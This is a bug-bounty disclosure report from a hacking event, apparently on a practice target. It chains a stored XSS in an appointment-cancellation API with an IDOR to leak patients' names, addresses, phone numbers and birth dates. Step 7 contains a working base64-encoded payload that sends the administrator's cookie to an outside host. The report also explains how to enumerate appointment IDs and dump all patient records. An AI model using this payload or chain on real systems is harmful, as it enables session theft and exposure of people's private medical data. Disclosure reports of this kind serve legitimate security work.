FirstBlood-#83Leaking PII data of users who have appointments using stored XSS and IDOR



On 2021-05-10, xnl-h4ck3r reported:

Summary

A stored XSS vulnerability exists in the manage appointments api /api/ma.php. An attacker can make an appointment, and then subsequently cancel it, but add the message parameter with an XSS payload that will fire on the admin cancellation page /drpanel/cancelled.php. This can leak the admins drps cookie value. This cookie can then be used to make an authorised GET request to /drpanel/drapi/query.php passing aptid parameter in the query string. An IDOR exists on this parameter that allows an attacker to enumerate the ID and therefore leak personal information for each user that has an appointment. On endpoint /drpanel/drapi/query.php the value of aptid takes the format 5691??19 where ?? is an even number starting at 02, 04, 06, etc. for each appointment booked. This endpoint will then reveal the Name, Address, Telephone and DOB of the user. User data of ALL patients can also be leaked using the leaked cookie value in a POST request to /drpanel/drapi/qp.php and post parameter of name=%20

Steps to Reproduce

  1. Book an appointment on /book-appointment.html and make a note of the Appointment ID that is given, e.g. 58450974-9db1-4a05-90be-a01bf0179c80
  2. Go to /yourappointments.php, enter your Appointment ID and click Retrieve Appointment
  3. Run traffic through Burp proxy
  4. Click CANCEL APPOINTMENT button.
  5. Go to the last POST to /api/ma.php in Burp history and send to Repeater.
  6. NOTE: ALTHOUGH THE APPOINTMENT HAS BEEN CANCELLED, YOU CAN STILL USE THE APPOINTMEMT ID IN THE API
  7. Now add the following post parameter message="%3e%3cscript/src="data:;base64,dmFyIHg9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7eC5vcGVuKCdHRVQnLCcvL3huMS51ay9jPScgKyBkb2N1bWVudC5jb29raWUpO3guc2VuZCgpOw=="%3e%3c/script/x%3e This is a Base64 encoding of var x=new XMLHttpRequest();x.open('GET','//xn1.uk/c=' + document.cookie);x.send();
  8. Send the Request
  9. Now log in as an administrator and visit endpoint /drpanel/cancelled.php
  10. Observe the XSS payload firing and sending the value of the admins cookie to my server:

  1. Make a GET request to /drpanel/drapi/query.php?aptid=5691???? where ???? is enumerated by adding 137 to the previous value each time.
  2. Observe the user data returned for each appointment:

  1. Make a POST request to /drpanel/drapi/qp.ph using the admins cookie, and providing a post parameter of name=%20
  2. Observe the response containing PII data of ALL patients:

Impact

The impact of this vulnerability is that an attacker could steal the admins drps cookie, then enumerate the aptid to then leak the personal data of users with appointments, or make a query to see ALL patients PII.

P2 High

Parameter:

Payload:


FirstBlood ID: 8
Vulnerability Type: Stored XSS

When cancelling an appointment, an attacker can add a malicious XSS payload that will execute against administrators/doctors


Respect Earnt: 2000000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.